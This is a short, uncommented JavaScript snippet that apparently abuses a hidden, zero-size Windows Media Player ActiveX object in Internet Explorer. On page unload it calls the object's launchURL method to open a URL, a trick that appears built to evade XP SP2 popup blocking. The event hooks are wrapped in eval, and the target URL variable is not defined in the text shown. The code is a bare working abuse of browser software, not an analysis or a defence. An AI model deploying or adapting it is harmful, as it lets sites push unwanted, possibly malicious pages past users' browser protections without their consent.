var isXPSP2 = false;
var u1 = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

//--------------------------------------------------------------------------------

function ext()
{
       if(exit)
     
               
      
               {
                         iie.launchURL(popURL);
               }
       
}

//--------------------------------------------------------------------------------

function brs1()
{
    document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u1+"'></object>";
}

//--------------------------------------------------------------------------------

function ver1()
{
 brs1();
}

//--------------------------------------------------------------------------------
isUsingSpecial = true;
eval("window.attachEvent('onload',ver1);");
eval("window.attachEvent('onunload',ext);");

//--------------------------------------------------------------------------------